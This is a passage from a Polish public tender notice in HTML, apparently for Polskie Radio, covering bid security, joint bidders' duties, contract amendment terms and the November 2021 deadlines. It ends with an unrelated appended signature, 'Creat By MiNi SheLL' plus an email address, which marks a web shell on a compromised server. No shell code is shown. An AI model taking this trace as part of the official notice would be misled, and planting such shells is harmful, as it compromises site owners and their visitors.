gwarancji) wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum/ spółki cywilnej)<br/>16.6.7.	gwarancja / poręczenie nie zawierały klauzul o ich automatycznym i całkowitym wygaśnięciu w przypadku zwrócenia oryginału gwarancji/poręczenia w terminie ich ważności, bez konieczności uzyskania odrębnego oświadczenia Zamawiającego <br/>o zrzeczeniu się uprawnień wynikających z gwarancji/poręczenia. <br/>16.7.	Nie wniesienie wadium w wymaganym terminie (także na przedłużony okres związania ofertą), w wymaganej wysokości, formie lub wniesienie w sposób nieprawidłowy skutkuje odrzuceniem oferty, zgodnie z art. 226 ust. 1 pkt 14) ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 13.1.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>13.2.	Wykazując spełnienie warunku udziału, określonego w pkt 11.1, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolności tych z nich, którzy wykonają czynności określone w przedmiocie zamówienia, do których zdolności wskazane w warunku są wymagane.<br/>13.3.	W celu wykazania podstaw do wykluczenia, wskazanych w pkt 10.1 oraz wykazania spełnienia warunku udziału określonego w pkt 11.1, wraz z oferta, każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z pkt 12.1.1., załącza do oferty wspólnej oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunku udziału sporządzone zgodnie ze wzorem stanowiącym Złącznik nr 3 do SWZ i wytycznymi zawartymi w pkt 12.1.1 oraz złożone zgodnie z wytycznymi zawartymi w Załączniku nr 7 do SWZ. Oświadczenie potwierdza spełnienie przez wykonawcę wspólnie ubiegającego się warunku udziału, w zakresie, w jakim każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazuje spełnienie warunku udziału, określonego w pkt 11.1.<br/>13.4.	W przypadku, gdy wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w celu wykazania spełnienia warunku określonego w pkt 11.1., polegają na potencje podmiotu udostępniającego zasoby (sytuacja określona w pkt 11.3) wraz z ofertą zobowiązani są złożyć oświadczenie oraz zobowiązanie podmiotu udostępniającego zasoby, wskazane w pkt 12.1.2.<br/>13.5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, z którego będzie wynikać, które elementy przedmiotu zamówienia będą wykonywać poszczególni wykonawcy.<br/>13.6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wraz z ofertą składają dokumenty wymienione w pkt 12.2 – w celu tam określonym.<br/>13.7.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają również dokumenty wymienione w pkt 12.3 – w zakresie i sytuacjach tam określonych.<br/>13.8.	W przypadku, gdy najwyżej ocenioną będzie oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed wyborem tej oferty Zamawiający w terminie wskazanym w pkt 12.4, wezwie wykonawców do:<br/>13.8.1.	złożenia przez każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia wskazanego w pkt 12.4.1;<br/>13.8.2.	złożenia wykazu oraz dokumentów lub oświadczeń wskazanych w pkt 12.4.2;<br/>Postanowienia pkt 12.5 – 12.7 mają zastosowanie.<br/>13.9.	Do wykonawców wspólnie ubiegających się o udzielenie zamówienia zastosowanie mają odpowiednie przepisy ustawy oraz postanowienia SWZ dotyczące wykonawców.<br/>13.10.	Wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają możliwość zmian postanowień Umowy: <br/>1)	w zakresie terminu, wskazanego w § 2 ust. 3 – w przypadku, gdy stan epidemii oraz pandemia choroby COVID-19, wywołana wirusem SARS-Co-V-2 lub ich następstwa skutkować będą czasowym zawieszeniem albo wstrzymaniem transportu lub produkcji Urządzeń lub elementów składowych, lub innymi utrudnieniami w transporcie lub produkcji – poprzez jego wydłużenie o przewidywany, czas występowania utrudnień, zawieszenia bądź wstrzymania transportu, produkcji, nie dłuższy jednak niż kolejne 3 miesiące, liczone od upływu terminu wskazanego w § 2 ust. 3 – pod warunkiem udokumentowania przez Wykonawcę faktycznego istnienia ww. utrudnień, <br/>2)	w zakresie terminu, wskazanego w § 2 ust. 4 – w przypadku, gdy stan epidemii oraz pandemia choroby COVID-19, wywołana wirusem SARS-Co-V-2 lub ich następstwa skutkować będą brakiem możliwości realizacji wdrożenia – poprzez jego wydłużenie o przewidywany, czas występowania utrudnień, zawieszenia bądź wstrzymania możliwości realizacji wdrożenia, nie dłuższy jednak niż kolejne 30 dni, liczone od upływu terminu wskazanego w § 2 ust. 4 – pod warunkiem udokumentowania i przedstawienia obiektywnego uzasadnienia przez Wykonawcę faktycznego istnienia ww. utrudnień, <br/>3)	w zakresie terminu wskazanego w § 2 ust. 4 – w przypadku gdy Zamawiający z przyczyn organizacyjnych lub technicznych albo związanych pandemią choroby COVID-19, wywołanej wirusem SARS-Co-V-2 lub jej następstwami, będzie musiał wstrzymać realizację wdrożenia – o czas niezbędny, nie dłuższy jednak niż 30 dni,<br/>4)	w zakresie terminu odbiorów o których mowa w §3 ust. 3 oraz w §3 ust. 8 – w przypadku zlecenia przez Zamawiającego przeprowadzenia przez osobę trzecią kontroli realizacji przedmiotu Umowy, zgodnie z postanowieniami §6 ust. 5; w zależności od etapu na którym będzie realizowana kontrola, odbiór ilościowy albo techniczny zostanie przeprowadzony nie później niż w terminie 7 dni roboczych od zakończenia kontroli; <br/>5)	w zakresie podwykonawców – w przypadku, gdy składając ofertę Wykonawca zobowiązał się do samodzielnego wykonania przedmiotu umowy, o którym mowa w § 2 ust. 1, a w okresie jego realizacji zaistnieje konieczność wykonania przedmiotu umowy z udziałem podwykonawcy – w tym przypadku Wykonawca niezwłocznie, nie później jednak niż na 7 dni roboczych przed rozpoczęciem świadczenia usług z udziałem podwykonawcy zobowiązany jest do: <br/>a)	wykazania powodów, dla których realizacji przedmiotu umowy wymaga udziału podwykonawcy, <br/>b)	wskazania części przedmiotu umowy, która zostanie przekazana podwykonawcy do wykonania, <br/>c)	podania nazwy (firmy) podwykonawcy, <br/>6)	zmiany podwykonawców, na zasadach określonych w § 12 niniejszej umowy, <br/>7)	w przypadku wystąpienia w okresie realizacji Umowy, o którym mowa w § 2 ust. 3 - 4, zdarzeń siły wyższej, poprzez dostosowanie jej postanowień i warunków wykonania przedmiotu Umowy w zakresie i celu umożliwiającym wykonane Umowy w warunkach będący następstwem wystąpienia siły wyższej, <br/>8)	klauzul dotyczących ochrony danych osobowych – w przypadku zamiany stanu prawnego dotyczącego danych osobowych lub przetwarzania tych danych, w zakresie w jakim zmiany te wpływać będą na treść klauzul zawartych w Umowie, w celu zapewnienia jej zgodności z przepisami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma przetargowa Polskiego Radia S.A., o której mowa w pkt 3.1 SWZ, dostępna pod adresem (https:// polskieradio.logintrade.net).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com